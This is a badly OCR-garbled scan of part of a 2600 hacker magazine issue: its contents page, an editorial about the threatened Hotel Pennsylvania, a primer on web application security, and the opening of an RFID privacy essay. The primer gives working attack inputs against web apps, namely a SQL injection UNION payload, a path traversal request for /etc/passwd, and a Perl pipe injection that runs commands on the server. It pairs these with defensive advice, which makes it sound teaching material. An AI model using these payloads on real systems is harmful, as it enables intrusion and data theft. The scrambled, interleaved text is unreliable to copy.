You are on page 1of 68

TIDBITS

Challenges ................................................................................................... .4
Understanding Web Application Security . . . . . . . ... . ... . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . 6
RFID: Radio Freak-me-out Identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . 9
Exploiting LiveJournal.com with Clickless SWF XSS . .. . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
Telecom Informer . . .. . . . . . . . . . . . . . . . .. . . . . . . . . .. . . . . . . . .. . . . . . . . . - . . . . . . . . .. . . . . . . . . .. .. . . . . . . ... . . .. .. . . . . 13
Avoiding Internet Filtering . . . . .. .. . . . . . . . . . . . . .. . . . . . . . . .. . . . . . . ... .. . . . . . . . . . . .. . . . . .. . . . . . . . . . . . . . . .. . . . . 15
Hacking Your Own Front Door . . . . . .. . . . . .. . . . . . .. . . . . . . . . . . . . . . . . . . . . . . .. . . . .. . . . . . . . . . ... . . . . . . . . . . .. . . 16
Dorking the DoorKing . . . .. .. . . . . . . . . . . . . . . . .. . . . . . . . . . . .. . . . . . . . . . . .. . . . . .. . . . . . . . . . . .. . .. . . . . . . . . . . . . . . . . 18
Security Holes at Time Warner Cable ... . . . . . ... . ... . . . .. . . . .. . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Hacking My Ambulance .. . . . ... . . . . . . . . . . . . . . . . . ... . .. . . . .. . . . . . . . . . . . . . . . . . . . .. . . . . . . . .. . . . . . . . . . . . . . . . . . 20
SSL MITM Attacks on Online Poker Software .......................................................... 24
Hacker Perspective . . . . . . . . . . . .. . . . . . . . .. . .. .. . . ... . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . .. - . . . . . . . . . . . . . . . . . . . . . . 26
Ripping MMS Streams . . . . . . .. . . . .. . . .. . . . . . . . . . .. . . . . . . . .. . . . . . . . . . . . . . . . . - . . . . ... . . . . . . . . . . . . . . . . . . . . . . . .. 29
Backspoofing 101 .......................................................................................... .30
Can I Read Your Email? . . . . . . . . . . . . . . . . .. . . . . . . . . . . ... . . . . . . . . . . . . . . . . . . .. . . . . ... . . . . . . . .. . . . . . . . .. . . . . . . . .32
Letters . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . - . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .34
Stalking the Signals . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . .. . . . . ... . . . . . . . . . . . . . .48
GoDaddy.com Insecurity . . . . . . . . . . . .. . . . . . . . . . . . . .. . . . .. . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . .50
Hubots: New Ways of Attacking Old Sy stems . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . ..51
Network Ninjitsu: Bypassing Firewalls and Web Filters . . .. . . . . . . . . . . . ... . . . . . . . . . . . . - . . . . . . . . . .. ..52
Hacking a Major Technical School's Website ........................................................ .54
Covert Communication Channels . . . . . . .... ... .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . .55
How to Cripple the FBI. .................................................................................... 60
Marketplace . . .. . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . ... . .. . .. . . . . - . . . . . . . . .. . . . . . . . . . . . . . . . . . . . .. . . . . 62
Puzzle . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . .. . . . . . . .. . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
Meetings . . . .. . . ... . . . . . . . . . . - . . . . . . . ... . . . . . . . . . . .. . . . . . . . . . . . . .. . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
Pl ease bel i eve us when we say that we
don't i ntenti onal l y set out to cause troubl e and
mayhem. I t somehow seems to al ways fi nd
us.
We started a hacker magazi ne because i t
was a subj ect that was of i nterest to a number
of us and there was a voi d to be fi l l ed. We
di dn't expect the fasci nati on, fear, obsessi on,
and demoni zati on that fol l owed us, courtesy
of everyone from the medi a to the government,
from the Fortune bUU to hi gh school teachers
and pr i nci pal s. I t j ust sort of happened that
way.
We di dn't ask to be thrown i nto the front
l i nes of the moti on pi cture i ndustry's copyri ght
battl es back i n ZUUU. That al so j ust happened
because of who we were and what we bel i eved
i n. There were many thousands that the Moti on
Pi cture Associ ati on of Ameri ca coul d have
taken to court for host i ng the DeCSS code on
thei r websi tes. But we somehow epi tomi zed
everythi ng the MPAA was agai nst and t hi s
made us t he perfect target for them. Merel y
exi sti ng apparent l y was enough .
And by si mpl y bei ng present at vari ous
pi votal moments i n hacker hi story where
there was nothi ng for us to do but speak out
agai nst vari ous i nj usti ces, we agai n found
oursel ves bei ng propel l ed i nto a posi ti on of
advocacy and l eadershi p, when real l y a l l we
were doi ng was conti nui ng to make the same
poi nts on what hacki ng was and what i t was
not. Locki ng peopl e i n pri son for bei ng overl y
curi ous or exper i menti ng on the wrong bi ts of
technol ogy was j ust wrong, pl ai n and s i mpl e.
I t was a poi nt we had started our very fi rst i ssue
wi th . And si nce so few others were sayi ng thi s
out l oud, i t became our fi ght once more.
Th i s ki nd of th i ng never seems to end.
Al so i n the year ZUUU wh i l e a l l eyes were
on the Republ i can Nati onal Conventi on i n
Ph i l adel phi a, i t was our own l ayout arti st
who was grabbed ofi the streets and l ocked
up on hal f a mi l l i on dol l ars bai l , charged
wi th bei ng a ch i ef r i ngl eader of oppos i ti on.
The onl y evi dence agai nst hi m was survei l
l ance footage that showed hi m wal ki ng down
a street tal ki ng on a cel l phone. Needl ess to
say, it di dn't sti ck and, i n fact, a l aws ui t agai nst
the ci ty for thi s nonsense was qui te successfu l .
But even that wasn't the fi nal chapter of the
story. Four years l ater i n New York, our edi tor
was al so taken off the streets whi l e the Repub
l i can Nati onal Conventi on was i n that ci ty.
Thi s ti me it seemed to be a random sweep of
peopl e who j ust happened to be standi ng on
a part i cul ar bl ock. Agai n, i t provoked wi de
spread outrage and condemnati on, as wel l as
a l l charges bei ng dropped and a l awsui t whi ch
conti nues t o be argued i n court t o thi s day. But
there's sti l l more. Recentl y a j udge ordered
the New York Pol i ce Department to rel ease
i nter nal documents on these events whi ch
they had been tryi ng to keep to themsel ves.
These documents started to see the l i ght of day
i n February of thi s year. And among the fi rst
to be reveal ed so far is a memo that outl i nes
what one of thei r bi ggest fears was. Yes, that's
ri ght. Us agai n. Apparentl y the NYPD was
concerned because not onl y was our l ayout
arti st rumored to be i n town (possi bl y prepared
to use hi s phone agai n) but he had spoken at
a conference di rectl y across the street from
where the Republ i can Conventi on was to be
hel d. And he had spoken on potenti al ways of
causi ng mi schi ef and mayhem! So once agai n
we were catapul ted to front and center, j ust for
di scussi ng the thi ngs that are of i nterest to us.
Even t he l ocati on of our conferences, hel d i n
t he same pl ace s i nce !4, were cal l ed i nto
questi on as bei ng provocati ve because they
were so cl ose to the si te of the Republ i can
Conventi on.
I t a l l al most reads l i ke a badTV sni pt, where
the same characters keep getti ng l aunched i nto
the center of attenti on week after week. I n that
ki nd of a setti ng, thi s happens because there
are onl y a certai n number of characters and
the story l i nes have to be kept i nteresti ng and
acti ve. I n real l i fe, thi s onl y serves to demon
strate the threat of actual l y reach i ng peopl e
who may share your i nterests and goal s. Not
onl y can you change the course of hi story i n
accompl i shi ng thi s but t he fear you i nsti l l al ong
the way among t he powers-t hat-be mi ght i tsel f
al so have a profound effect on the outcome.
Scary st uff i ndeed.
Page 4 2600 Magazine
B ut now we fi nd oursel ves yet agai n i n a styl e" wal l of advert i s i ng that woul d repl ace
posi ti on where we have no choi ce but to take the ornate entryway of t he exi sti ng hotel .
a stand and hel p start someth i ng that cou l d So the fi nanci al i ndustry and t he adverti sers
have a profound effect on a l ot of peopl e. wou l d be thr i l l ed. But t he peopl e who vi si t
And thi s t i me i t goes wel l beyond the hacker New York Ci ty wou l d have one l ess afford
communi ty. We l earned earl i er t hi s year that abl e hotel to stay i n (the near l y 2000 rooms
the s i te of our conferences ment i oned above in Hotel Pennsyl vani a are often fi l l ed year
- New York's hi stor i c Hotel Pennsyl vani a - i s rou nd) and one more hi stor i c structure wou l d
set t o be demol i shed. As of t hi s wri ti ng, the be destroyed. Thi s doesn't even address the
onl y opposi ti on to thi s has been a whol e l ot overwhel mi ng bel i ef that such a massi ve
of voi ces i n the wi l derness wi th no apparent fi nanci al structure s i mpl y i s n't needed wi th
u ni ty. So once more i t appears that our the ent i re fi nanci al di stri ct downtown bei ng
communi ty wi l l have to step up and hope- rebu i l t. Were i t to be constructed, however,
ful l y make a di fference. there i s l i tt l e doubt that i t wou l d become a
Why shou l d we care? Si mpl e. Ever s i nce heavi l y guarded fortress wi th very l i mi ted
start i ng the Hackers On Pl anet Earth confer- access i bi l ity due to post-91l 1 syndrome, i n
ences back i n 1 994, the Hotel Pennsyl vani a stark contrast t o t he open and bustl i ng hotel
has been our home (wi th the except i on of l obby that currentl y occupi es the space.
Beyond HOPE i n 1 997). I t has three maj or We know the hotel i sn't i n t he fi nest of
factors goi ng for i t: 1 ) Locat i on - the hotel i s shape. I n thi s age of "bi gger i s better" and
di rect l y across t he street from t he bus i est trai n i ns i st i ng that every modern conveni ence be
stati on i n North Amer i ca and al so centra l l y wi th i n reachi ng di stance a t a l l ti mes, there
l ocated i n Manhattan; 2) Hi story - the hotel are many who s i mpl y can not handle a pl ace
i s a fasci nati ng connecti on to the past, both wi th such Ol d Wor l d decor. But i t's sti l l our
archi tect ural l y and i n t he many events and home and we've grown rat her attached t o i t .
peopl e who have been l i n ked together over Wi thout i t, the future of the HOPE confer
the decades i n i ts vast hal l ways; and 3 ) Cost ences wou l d be very much i n jeopardy and
- t he rel ati ve cheapness of the hotel i s what certai nl y not as conveni ent to get to for those
makes i t possi bl e for us to cont i nue to have from out of town. And thi s is the key. The
the conferences i n New York Ci ty as wel l as maj ori ty of peopl e affected by i ts destructi on
for our attendees from out of town to be abl e wou l d l i kel y be peopl e who don' t l i ve l ocal l y
t o stay there. and have probabl y not even heard of these
There was one t hi ng that was dr ummed omi nous pl ans yet. That i s somethi ng we can
i nto our heads over and over agai n when change.
we were l ooki ng to start a maj or hacker We al so have to real i ze that thi s i s so
conference i n the Uni ted States, especi al l y i n much bi gger t han ou r own relati vel y sma l l
response to ou r desi re to have i t i n New York: communi ty. There are scores of other confer
It was i mpossi bl e. And to t hi s day it remai ns ences and l i teral ly mi l l i ons of people who
i mpossi bl e that we coul d hol d an event of have wal ked through the doors and gotten
th i s s i ze i n a ci ty l i ke New York and manage somethi ng out of the pl ace. By l i nki ng as
t o keep i t affordabl e. B ut we do i t anyway. I t's many of them together as possi bl e, we have
because of a combi nati on of magi cal i deas, the potenti al of u ni t i ng forces and, at the very
the magi cal peopl e who come and bui l d i t l east, speaki ng out loudl y agai nst l os i ng thi s
every two years, and t he magi cal place that hotel . I t seems as i f th i s has become our obli
makes i t a l l possi bl e. Th i s i s a l l most defi - gati on. And, as h i story has shown us, bei ng
ni tel y worth preservi ng. who you are at a part i cul ar pl ace and poi nt i n
I n the "real word" however, peopl e don't t i me is someti mes a l l you need.
thi nk l i ke thi s . It a l l comes down to dol l ars and The odds are certai nl y agai nst us . And thi s
cents and how t o make t he most i mpressi ve i s l i kel y to be a fi ght that we' re invol ved i n
profi t. And those i n charge ( namel yVornado, for qu i te some ti me to come. But we bel i eve
the real ty fi rm that happens to own the hotel ) gett i ng i nvol ved i n thi s could be an upl i ft i ng
fel t i t woul d be most profi tabl e t o tear down exper i ence, one where we tru l y real i ze the
the hotel and repl ace i t wi th a huge fi nanci al i mportance of i ndi vi dual voi ces brought
tower. Those i n the fi nance i ndustry wou l d together i n a common cause. There wi l l be
no l onger have to ri de the s ubway downtown l ots more on thi s in t he future. For now, we
to get to work. I nstead they could commute hope you can j oi n us on l i ne at http://tal k.
from the s uburbs by trai n, exi t Penn Stati on, hope. net to di scuss ways to save t he hotel
and s i mply wal k across the street to thei r j obs. ( and pl an for future HOPE conferences) i n
And cvtiyOnt l eavi ng Penn Stati on wou l d a l i vel y for um envi ronment. And we hope
wi nd up bei ng barraged wi th a "Ti mes Square everyone can hel p us spread t he word.
Spring 007ge 5
by Acidus
acidus@msblabs.org
Most Significant Bit labs
(http://www.msblabs.org)
Web appl i cati ons are compl ex servi ces
run n i ng on remote systems t hat are accessed
wi th onl y a browser. They have mu l t i pl e
attack vectors and t hi s art i cl e i s by no means
a comprehensi ve gui de. Today I wi l l di scuss
what web appl i cati ons are, how t hey work,
di scuss common attack methods, provi de
bri ef exampl es of speci fi c attacks, and di scuss
how t o proper l y secure a web appl i cati on.
What do I mean by web appl i cati on? A
web appl i cati on is a col l ecti on of stati c and
dynami ca l l y generated content t o provi de
some servi ce. Maybe i t' s Wi ki pedi a provi di ng
an ever- updat i ng knowl edge base or Amazon
provi di ng a commerce portal . These appl i
cat i on can span mu l t i pl e domai ns, such as
Wachovi a ' s on l i ne bank i ng system. As you
can see i n Fi gure 1 , web appl i cati ons have
mu l t i pl e parts. There i s a program used to
access the web appl i cati on known as a user
agent. There i s a J avaScri pt l ogi c l ayer whi ch
al l ows very l i mi ted code t o execute on the
cl i ent ' s machi ne. Thi s i s i mportant because
sendi ng requests across the I nternet cl oud to
the server i s expensi ve i n terms of ti me and l ag.
There i s a web server whi ch has some ki nd of
server l ogi c l ayer. Thi s l ayer uses i nputs from
the cl i ent such as cooki es or parameter val ues
to dynami ca l l y generate a response. Us ua l l y
t h i s response i s composed of data stored i n
a back end database. Th i s database i s mai n
tai ned and popul ated by var i ous programs
l i ke web crawl ers and admi n scri pts.
Web appl i cat i ons are not a pass i ng fad.
Maj or compani es l i ke Amazon, eBay, Googl e,
Sal eforce. com, and UPS a l l use compl ex web
appl i cati ons wi th several deri vi ng a l l thei r
i ncome from t hem. Many more compan i es
are devel opi ng web apps stri ct l y for i nter nal
use. The cost benefi ts of havi ng an appl i ca
ti on that i s centra l l y managed and ca n be
accessed by any browser regardl ess of the
u nderl i ne |5 are s i mpl y too great to i gnore.
Wi th thei r pl ace i n t he on l i ne l andscape
assured i t i s essenti al for hacker and secu ri ty
professi onal a l i ke to u nderstand fundamental
secur i ty ri sks of a web appl i cati on.
As you can s ee web appl i cati ons di ffer from
tradi t i onal appl i cat i ons i n that they exi st on
n umerous t i ers and span mu l t i pl e di sci pl i nes.
Programmers, i nter nal web desi gners, graphi c
art i sts, database admi ns, and I T admi ns are
a l l i nvol ved. I t's easy for t hi ngs to s l i p t hrough
the cracks because peopl e assume a tas k i s
someone el se' s respons i bi l i ty. Thi s confus i on
gap i s ri pe for vul nerabi l i t i es.
Backend
Processes
Page 6 2600 Magazine
Attacki ng web appl i cati ons is a l ot l i ke of t hi s art i cl e.
bei ng a detecti ve. The structure of the appl i - Prameter Mani pulation
cati on contai ns your cl ues. From them you Prameter mani pul at i on i nvol ves modi -
l earn i nformati on about i ts structure, i f the fyi ng the val ue of i nputs tryi ng to make the
appl i cati on i s us i ng pre- made components appl i cati on act i n ways the desi gners never
( l i ke phpBB) , what i ts i nputs are, and what i ntended. We have a l l seen a s i te wi th a
types of resources are ava i l abl e. You al so have URL l i ke " si te. com/story. php?i d=1 732" . The
a l i st of wi tnesses you can ask to get i nforma- "i d" i nput speci fi es whi ch resource to serve
t i on not di rect l y avai l abl e from the si te. These up. Modi fyi ng t hi s val ue al l ows access to
are your search engi nes. How often is the si te di fferent stori es that mi ght not normal l y be
updated? Does the IT staff ask quest i ons on avai l abl e. Thi s i ncl udes th i ngs l i ke archi ved/
new groups or for ums? Are there any known del eted i tems or future/unpubl i shed i tems.
vu l nerabi l i t i es agai nst any of the appl i cati on ' s Th i s techni que i s known as " val ue fuzzi ng"
components? Th i s i s j ust basi c system fi nger- and i s qu i te usefu l .
pri nti ng, onl y you are fi ngerpr i nt i ng an appl i - What i f we send a request wi t h "i d=-
cat i on i nstead of a system. 1 ": Chances are the appl i cati on wi l l return
Web appl i cati on attacks fal l i nto two cate- an error. However the error mi ght contai n
gori es: resource enumerat i on and parameter i nformati on that is usefu l . Th i ngs l i ke the fi l e-
mani pul at i on. system path for t hat resource. Maybe we' l l
Resource Enumeration get some i nformati on about what database
Resource enumerat i on i s a l l about the appl i cati on tri ed to contact or even i nfor
accessi ng resources that the web appl i ca- mati on about the structure of that database!
t i on does n' t publ i cl y advert i se. By t hi s I mean Perhaps we' l l get a stack track that wi l l show
resources that exi st but have no l i n ks to them what functi ons the program i s cal l i ng or even
anywhere in the web appl i cati on. the val ues of the parameters. Thi s techni que
The fi rst way to execute resource enumer- is known as " edge case test i ng" or " bounds
at i on i s based on thi ngs you al ready know test i ng. " Programmers commonl y forget to
about the appl i cati on. If Checkout . php exi sts, deal wi th edge cases so th i s area i s r i pe for
make a request for Checkout. bak or Checkout. vu I nerabi |i t i es.
php. ol d. I f you succeed you'l l get a copy of There are several attacks whi ch are
the PHP source code compl ete wi th database real l y j ust speci fi c exampl es of parameters
connect i on stri ngs and passwords. mani pu l at i on. We wi l l di scuss SQL I nj ec-
I n addi ti on to what fi l es are present i n the ti on, Command Execut i on, and Cross Si te
appl i cati on, you al so know about the struc- Scri pti ng.
t ure. Suppose there i s a resource l i ke "/users/ SQL I njection
aci dus/profi l es/bookmar ks. php" . After tryi ng Al most a l l compl ex web appl i cati on,
vari ous per mutat i ons of bookmarks. zip and from Amazon to Ti nyURL, have a back end
such, sendi ng a request for "/users/" cou l d database. The i nputs you suppl y the web
return somethi ng i nterest i ng. Perhaps i t's a appl i cati on when you request a resource are
di rectory l i st i ng, or it serves an ol der defaul t eventual l y converted i nto some ki nd of SQL
page. Regardl ess, you wi l l fi nd l i nks to statement to extract content from thi s back
resources that mi ght not be menti oned el se- end database. Dependi ng on how wel l the
where on the si te. Whi l e web servers can be i nputs are fi l tered you can get ar bi trary SQL
confi gured to deny access to di rectori es, t hi s statements t o r un on t hi s back end database.
sett i ng can be gl obal or speci fi c to a fol der I t i s best to show an exampl e. Suppose we
group. Any sett i ngs can al so be overri dden di scover a URL l i ke"/Showltem. php? i d=2 71 0" .
on a per fol der bas i s. J ust because "/users/" Chances are 2 7 1 0 i s the pri mary key i n some
or "/users/aci dus/" don ' t work does n' t mean ki nd of product tabl e i n t he database. Let's
"/users/aci dus/profi l es/" won ' t work. Al ways say in the PHP we have an SQL statement
send requests for every di rectory you see. that l ooks l i ke SELECT * FROM Products WHERE
Once you ' ve sent requests for resources prodID " + id. Thi s is cal l ed a concatenated
based on t hi ngs you know, you shou l d si mpl y query str i ng and i s vul nerabl e t o SQL I nj ec
guess for resources. "/test . aspx", "/temp. php" , t i on. I f I send 2710 UNION ALL SELECT * FROM
and "/foo. html " are good ones. You cou l d try Customers the res ul t i ng SQL statement i s
"db. i nc" , "password. txt", or "websi te. zi p" . The
SELECT * FROM Products WHERE prodID " 271 0
di rectori es "/admi n/", "/stats/", and "/prOnl" are
UNION ALL SELECT * From Customers. Thi s
good i deas too. A comprehensi ve l i st of fi l es
statement wi l l ret urn the product i nformati on
and di rectori es to guess i s beyond the scope
for product 2 7 1 0 and a l l the records i n the
Spring 2007Page 7
Customers tabl e (ass umi ng it exi sts). Thi s i s
si mpl y one exampl e of sQL i nj ect i on. See 111
and [21 from more i nformati on.
SQL i nj ecti on i s a bi g probl em. The Pr i s
Hi l t()nlMobi l e hack di dn't happen because
someone sn i ffed the phone's traffi c. T-Mobil e's
websi te had an i nterface to al l ow s ubscri bers
access to their address books. Thi s means
t he webs i te had t o touch t he database that
Cross Si te Scripting
Cross Si te Scri pti ng ( XSS) i s a mechani s m
t o i nj ect Javascri pt i nto t he web page that i s
returned t o t he user. Consi der t he s i mpl est
exampl e, as s hown i n Fi gure 2. The web
appl i cati on has a personal i zed greeti ngs
page. The key to the vul nerabi l i ty i s that the
i nput parameter name i s refl ected i nto the
page that i s returned to the user. As Fi gure 3
stores contact i nformati on. An attacker found shows, i f I i nsert a bl ock of J avascri pt i t too
an i nput they coul d expl oi t and dumped out i s returned to the user. So what can do you
everal address books through the T-Mobi l e wi t h J avascr i pt? You can steal cooki es, h i j ack
web page usi ng sQL i nj ecti on . sessi ons, l og keystrokes, capture HTML traffi c
,

,
,,,,,
~~

~~
~~~~~~~~~~~~~~

(aka s
c
reen scrappi ng), and many
leoelloI
other th i ngs. See [5J and [6] for
/
more i nformati on about nasty

th i ngs J avascr i pt can do. See [7]



for a case study us i ng XSS AJAX
/: `
to make mal i ci ous requests as

<h1>HeI|othereBmy!<]hl> another user.


Xss can al so get i nj ected
i nto the back end database of
mmmmmmmmmm mmmmm=m= a websi te, commonl y through
Command Execution
Many times there are appl i cati ons that are
executed on a web server simpl y by vi si t i ng
a page. For exampl e, nsl ookup, whoi s, fi nger,
pi ng, traceroute, upti me, who, l ast, and cat
can be found i n 50-cal l ed appl i cati on gate
ways. Thi s is where a web page recei ves i nput
from the user and passes i t to a nati ve appl i
cati on, returi ng the output. These gateways
are qu i te common dna were among the fi rst
uses of web pages and CGI . Here is an actual
Perl scr i pt I ' ve seen i n the wi l d whi ch serves
pages:
$res param('fle'),
open (FIN, $res);
@FIN * <FIN>;
foreach $fn (@FIN) { print "$fn\n" }
A request for "/cgi -bi n/fi l e. cgi ?fi l e=contact.
html " wi l l ret ur n the contents of the fi l e. Fi rst
of a l i i can see one vul nerabi l i ty that i s n' t even
a command executi on. Maki ng a request for
"/cgi - b i n/fi I e . cgi ? fi I e= . ...../. . /. . letc/passwd"
wi l l gi ve you the Uni x password fi l e. Further,
the open command supports the use of pi pes.
Pi pes a l l ow a command to be executed and
i ts output sent t o another program. A request
foru m posts, member profi l es, and custom
stock tickers. Thi s i s especi al l y nasty s i nce
the XSS wi l l affect many more peopl e. There
are many avenues to l aunch Xss attacks . [8J
provi des a detai l ed l ook at the di fferent XSS
mechani sms and defensi ves.
As you can see XSS i s an extremel y
compl ex topi c and I ' ve onl y br ushed the
surface. Due to technol ogi es l i ke AJAX and
the fact that everyone i s usi ng standards
compl i ant browsers the danger of XSS i s
much hi gher than i t was when XsS was or i gi
nal l y di scovered i n 2000. For some of t he
rea l l y nasty stuff, see my B l ack Hat Federal
presentati on [91.
Defensives
Al most a l l web appl i cati on attacks can
be stopped by va l i dat i ng or fi l ter i ng the
i nputs of the appl i cat i on. sQL i njecti on i s n' t
poss i bl e i f you r numer i c i nputs onl y contai n
numbers. XsS attacks are not poss i bl e i f you
don ' t al l ow a subset of a mar kup l anguage i n
you r i nput . A wel l pl aced regex can save you
a l ot of headache i f i t's i n the proper pl ace.
J ust because you have cl i ent si de J avascript
for "/cgi - bi nlfi l e. cgi ?fi l e=nmap
-vi" wi l l execute nmap on the
server i f i t exi sts ! Thi s happens
because the open functi on wi l l
]BBBSS..

execute the nmap command
for you and t he pi pe means the
open functi on reads the output

1

<M3>1EO LDCI6 <bLHl>OdODCSS..
from " nmap -v" as if it were a
fi l e. See 131 and [41 for more
<]ML
i nformat i on.
Page 8 2600 Magazine
to val i date i nput val ues does n' t mean you're
protected. I can al ways di rect l y connect to
you r appl i cat i on and compl etel y bypass your
fi l ters. Al ways i mpl ement fi l ters on t he server
si de! Your mantra shou l d be " never trust
anythi ng I get from the cl i ent . " Everyt hi ng you
get from the cl i ent i ncl udi ng cooki es, query
stri ngs, POST data, and HTTP headers can a l l
be faked. Al ways make s ure you i mpl ement
some ki nd of l ength restri cti on on you r fi el d
too. Otherwi se someone mi ght i mpl ement
a fi l esystem on top of your web appl i cati on
[ 1 0] !
Conclusions
I hope thi s art i cl e served as a n i ce pr i mer
on a l l the i ssues sur roundi ng web appl i cati on
securi ty. I t's a compl ex fi el d and I encourage
you to check the ci ted works to l earn more.
There i s no group, there i s onl y code.
References
[ 1 ] SQL Injection Whitepaper ( http: //www .
.s pi dynami cs . com/s pi l abs/educat i on/wh i te
"papers/SQLi nj ecti on. html ) Exampl es of SQL
i nj ect i on.
[2] Blind SQL Injection Whitepaper ( http://
.www. s pi dynami cs. com/assets/documents/
.B l i nd_SQLlnj ecti on. pdf) Exampl es of B l i nd
SQL I nj ecti on where you don ' t have ODBC
error messages t o hel p you craf attacks.
[3] Web Security and Privacy ( http://www.
.orei l l y. com!catal oglwebsec2/i ndex. html ) A
rather dated O' Rei l l y book that has an excel -
RFIO:
l ent secur i ty sect i on i n chapter 1 6.
[4] Perl CC|Security Notes by Chris ( http://
.www. xed. ch/l wm/secur i tynotes.html ) Wel l
wri tten page goi ng i nto many more command
execut i on i ssues wi t h Per l t han I covered.
[5] XSS-Proxy (http://xss-proxy.sf. net) XSS
Proxy shows how JavaScri pt can be used to
mon i tor keystrokes and can recei ve th i rd
party commands.
[ 6] Phuture of Phishing ( http://www.
..msbl abs. orglt al ksl) Shows some of the nasty
t hi ngs you can do wi t h XSS and how XSS can
fac i l i tate phi s hi ng.
[7] MySpace.com Virus ( http://namb. l a/
..popul ar/tech. ht ml ) Techni cal detai l s of the
MySpace. com vi rus as tol d by the author.
Shows how XSS attacks can be augmented by
AJAX.
[8] Real World XSS ( http://sandspri te. com/
.Sl euth/papers/ReaIWorl d_XSS_l. html ) An
excel l ent paper di scussi ng a l l aspects of the
XSS r i sk.
[9] Web Application Worms and Viruses
( h t t p : //www. s p i dy n a mi c s . c o m/s p i l a bs /
"ed u c a t i on/ pr es e n t at i o n s/b i Il y h offma n
.-web_appworms_vi ruses. pdf) Detai l s sel f
propagat i ng web mal ware and shows some
very nasty i mpl i cat i ons of XSS.
[ 1 0] TnyDisk ( http://www. msbl abs. orgl
.t i nydi skl) I mpl ement i ng an appl i cat i on on
top of someone el se's web appl i cat i on .
K8OO |IC8KHCOUI |OC
by KnlghtlOrd
Knl ghtIOrd@knlghtIOrd.org
RFI D has become something of a hot
topi c i n the hacki ng wor l d. There have heen
mu l t i pl e presentations on securi ty and pr i vacy
of RFI D and al so the technol ogy heh i nd it.
Th i s articl e is des i gned to be a what-if type
scenar i o on what RFI D is potent i al l y capahl e
of and where the technol ogy i s headi ng.
RFI D stands for Radi o Frequency I den
t i ficati on whi ch obvi ousl y means i denti
fyi ng objects us i ng radio frequency. Current
i mpl ementations i nclude aset management,
i nventory control , i nventory tracking, access
control , and enti ty i denti fi cat i on. The fi rst
three are usuall y i mpl emented i n a busi
ness envi ronment to track i nventory from
one l ocati on to another or IC mon i tor asset
activity to isol ate theft si tuat i ons and probl em
areas . These i mpl ementat i ons of RFI D are
very effi ci ent and perform a val uabl e task for
Spring 2007Pge 9
a business. The fourth exampl e is not so good.
RFI D is being changed into a new type of I D
for peopl e a n d animal s t o be used instead of
a hard-copy form of identification . This may
seem convenient for peopl e and they don't
see why this is bad. There are many possi
bil ities for this technol ogy to t ur n our wor l d
upside down and al l ow for Bi g Brother to
tru l y manifest itsel f.
Cu rrent l y a human being can receive an
impl anted RFI D chi p t hat stores an identifica
tion n umber that associates them with infor
mation in a database. This can be anything
from personal data such as name, address,
and birth date to medical history, financial
information, famil y information, etc. The
cost of storage space now is so cheap that it
wou l dn't be out of the question to store just
about every type of information on any one
person so that any organization ca n uti l ize
the technol ogy imbedded in said person . If
you don't get where I am going with this then
think a massive database with information on
every person t hat has an impl anted tag. Now
you may say what i s t he big deal ? There are
al ready databases out there with our informa
tion. Why shoul d one more be any different?
Wel l the probl em is this. Any database that
contains that vast amount of information
has to be control l ed by someone. More than
l ikel y that someone wil l be the government.
This may not seem so scary either. B ut wait,
there is more.
The possibil ities are t hen endl ess for the
data and scenarios that the government
can observe. Not onl y can the government
observe this information but so can anyone
el se who can figure out how t o get the data
off the tags. Si nce our country is basical l y
r un by huge retail out l ets it is not too far of
a stretch to see product mar keting anal ysis
based on human purchase activity which is
a l l based on RFI D technol ogy. Picture wal k i ng
into Wal -Mart and having the racks scan your
RFI D tags and create some kind of notice to
you to point on items that you prefer based
on past purchase history. You regu l ar l y buy
bl ack cotton t-shirts in size l arge so the rack
wil l recognize this data and highl ight the rack
with the bl ack cotton t-shirts with l itt l e l ights
attached to a l l the hangers that fl ash as you
approach. The same can be said about shoes.
You wear a size 13 so it shows you onl y the
size 13 shoes in stock. Now take it one step
further and say you purchase one of those
pairs of shoes. The shoes themsel ves have an
RFI D tag imbedded in them so now not onl y
can we see where you are going based on the
i mpl anted RFI D tag, but we can al so see t hat
you bought your shoes from Wal -Mart and
produce Wal -Mart advertising on interactive
bil l boards as you pass by.
When you wal k into a coffee shop they
wi l l al ready start making you r favorite coffee
because they got that information from your
tag. This may seem cool , but then they ask
you how your mother is doing because they
saw on the report that she had come down
with an il l ness and had to go to the hospital
the day before and they now have her taking
penicil l in for an infection . That thought in
itsel f is pretty scary. You don't want your l ocal
coffee house t o know everything about you,
do you? How can you even make a s ma l l
decision l ike whether you want cream or not
if they al ready know based on trends they
have anal yzed on you r activity for the l ast
fi scal year?
When everyone becomes a n umber we
wil l see the true possibil ities of this tech
nol ogy. A weal th of knowl edge is attached to
you and that information is accessibl e by way
too many peopl e for it not to be a l itt l e scary.
There are good things that can come out of
this, but is convenience better t han privacy or
free wil l ? | think not
RFI D in its current i mpl ementations has
been proven to be a rel iabl e sol ution for
tracking inventory. Change the word inven
tory to hu mans and you see the probl em. The
technol ogy does not change from one impl e
mentation to the other. The data on the tag
may change somewhat, but the fundamental s
do not. So what i s stopping t he goverment
from pl acing readers on every goverment
owned piece of property and monitoring
the activities of everyone with an i mpl anted
tag? Not a whol e l ot. Right now the cost for
a reader is about $40 to $120 for a LF ( l ow
frequency) modul e. The gover nment, being
